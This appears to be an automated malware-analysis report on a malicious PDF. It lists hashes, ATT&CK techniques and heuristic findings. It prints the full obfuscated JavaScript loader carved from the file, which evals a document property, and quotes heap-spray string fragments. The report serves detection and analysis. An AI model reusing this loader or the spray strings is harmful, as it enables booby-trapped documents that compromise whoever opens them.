PDF malware analysis — malicious · 4feb5e89d6e05a9a

MALICIOUS

PDF

6.8 KB Created: 2009-07-13 19:22:54 Authoring application: sOY First seen: 2026-05-08

MD5: 72c4335b0cb1d89f5056a800d32c8f6f SHA-1: bd240f5e6c1646c749dda9b019c282e07dc960ad SHA-256: 4feb5e89d6e05a9a129dc5bcc697465b196082f2af02ef026c89d9251843a9fa

146 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 JavaScript/JScript T1204.002 Malicious File

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT', 'PDF_JS', and 'PDF_UNESCAPE'. The JavaScript code appears to be obfuscated but includes calls to 'unescape' and string manipulation, suggesting an attempt to decode and execute a payload. The reconstructed strings 'unescape('%25' + 'W9090W9090'.replace(/W/g, 'Au'.replace(/A/g, 'B' /B/g, unescape('%25'))))' and 'unescape('%25' + 'W0c0cW0c0c'.replace(/W/g, 'Au'.replace(/A/g, 'B' /B/g, unescape('%25'))))' are likely part of this obfuscation, potentially leading to the download or execution of further malicious content. The presence of JavaScript actions and the use of unescape point towards an exploit attempt.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

7 0 obj << /JS (paslit=0;while(paslit<7){var litrap={woklit:null};paslit++;}fempas='';litwok=2522;litwok--;feepas={pasfem:'litpas'};function raplit(feewok,pasfee){this.ripdin=2149;ripdin++;return feewok.replace(pasfee,fempas);this.wokdin=null;if(wokdin==3151){var rapdin=2368;rapdin+=1464;}}function ripfem(dinrap){this.dinrip=6429;dinrip-=7473;return dinrap}function feerip(riplit,ripfee,pasdin){this.dinpas='litrip';return ripfee}function feerap(rapfem){var femrip=null;femrip+=8351;return new RegE …

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x173 1660 bytes

Filename	Kind	Source	Size
`javascript_obj0007_000.js`	pdf-javascript-stream	PDF /JS object 7 at offset 0x173	1660 bytes
SHA-256: `a0418946736df2f637d3e53bd77581e719cb6dde16d4e00b347e781843929b31`
Preview script First 1,000 lines of the extracted script paslit=0;while(paslit<7){var litrap={woklit:null};paslit++;}fempas='';litwok=2522;litwok--;feepas={pasfem:'litpas'};function raplit(feewok,pasfee){this.ripdin=2149;ripdin++;return feewok.replace(pasfee,fempas);this.wokdin=null;if(wokdin==3151){var rapdin=2368;rapdin+=1464;}}function ripfem(dinrap){this.dinrip=6429;dinrip-=7473;return dinrap}function feerip(riplit,ripfee,pasdin){this.dinpas='litrip';return ripfee}function feerap(rapfem){var femrip=null;femrip+=8351;return new RegExp('['+rapfem+']','g');dinwok=0;do{var femspa='feespa';dinwok++;}while(dinwok<8);}var spafee=0.0093;if(spafee>0){this.dinspa=0;while(dinspa<3){this.evespa=0.003;dinspa++;}}i=(this);this.paseve=0.013;wokfem=raplit('XdtoFc',feerap('8ObFKXetP'));var spalit=null;spalit+=0.0273;z=wokfem;function evepas(evewok,spafem,everip){for(var everap=0;everap<5;everap++){this.wokeve=0;while(wokeve<6){this.rapeve=5842;rapeve+=0.0096;wokeve++;}}return everip}femwok=raplit('daYpFp',feerap('tFYdk'));litspa=6062;litspa-=0.0092;u=femwok;this.ripeve=0;while(ripeve<4){for(var spadin=0;spadin<7;spadin++){for(var spaeve=0;spaeve<5;spaeve++){this.ripbal=0.0277;ripbal+=8256;}}ripeve++;}wokfee=raplit('TeLvjawl',feerap('6hw1mLjNgT'));unsdin=0.008;unsdin-=2196;l=wokfee;femrap=raplit('1a6pQp',feerap('6XHdQVt1I'));var unsbal=['spabal','feeuns'];u=femrap;for(this.unsfem=0;unsfem<4;unsfem++){balpas=0.01;balpas+=7146;}rapfee=raplit('WtmiWt2lfe',feerap('7WHEFLf2m'));balrap=0;ix=rapfee;var balrip=3988;balrip--;a=(this[ix]);var balspa=0;while(balspa<3){femuns=0.0061;femuns--;balspa++;}i[u][z][l](a);unsfee=0;while(unsfee<4){for(this.eveuns=0;eveuns<7;eveuns++){unslit=['lituns','unseve'];}unsfee++;}

SHA-256: a0418946736df2f637d3e53bd77581e719cb6dde16d4e00b347e781843929b31

Preview script

First 1,000 lines of the extracted script

paslit=0;while(paslit<7){var litrap={woklit:null};paslit++;}fempas='';litwok=2522;litwok--;feepas={pasfem:'litpas'};function raplit(feewok,pasfee){this.ripdin=2149;ripdin++;return feewok.replace(pasfee,fempas);this.wokdin=null;if(wokdin==3151){var rapdin=2368;rapdin+=1464;}}function ripfem(dinrap){this.dinrip=6429;dinrip-=7473;return dinrap}function feerip(riplit,ripfee,pasdin){this.dinpas='litrip';return ripfee}function feerap(rapfem){var femrip=null;femrip+=8351;return new RegExp('['+rapfem+']','g');dinwok=0;do{var femspa='feespa';dinwok++;}while(dinwok<8);}var spafee=0.0093;if(spafee>0){this.dinspa=0;while(dinspa<3){this.evespa=0.003;dinspa++;}}i=(this);this.paseve=0.013;wokfem=raplit('XdtoFc',feerap('8ObFKXetP'));var spalit=null;spalit+=0.0273;z=wokfem;function evepas(evewok,spafem,everip){for(var everap=0;everap<5;everap++){this.wokeve=0;while(wokeve<6){this.rapeve=5842;rapeve+=0.0096;wokeve++;}}return everip}femwok=raplit('daYpFp',feerap('tFYdk'));litspa=6062;litspa-=0.0092;u=femwok;this.ripeve=0;while(ripeve<4){for(var spadin=0;spadin<7;spadin++){for(var spaeve=0;spaeve<5;spaeve++){this.ripbal=0.0277;ripbal+=8256;}}ripeve++;}wokfee=raplit('TeLvjawl',feerap('6hw1mLjNgT'));unsdin=0.008;unsdin-=2196;l=wokfee;femrap=raplit('1a6pQp',feerap('6XHdQVt1I'));var unsbal=['spabal','feeuns'];u=femrap;for(this.unsfem=0;unsfem<4;unsfem++){balpas=0.01;balpas+=7146;}rapfee=raplit('WtmiWt2lfe',feerap('7WHEFLf2m'));balrap=0;ix=rapfee;var balrip=3988;balrip--;a=(this[ix]);var balspa=0;while(balspa<3){femuns=0.0061;femuns--;balspa++;}i[u][z][l](a);unsfee=0;while(unsfee<4){for(this.eveuns=0;eveuns<7;eveuns++){unslit=['lituns','unseve'];}unsfee++;}

Open this report in the interactive analyzer, or submit your own file for analysis.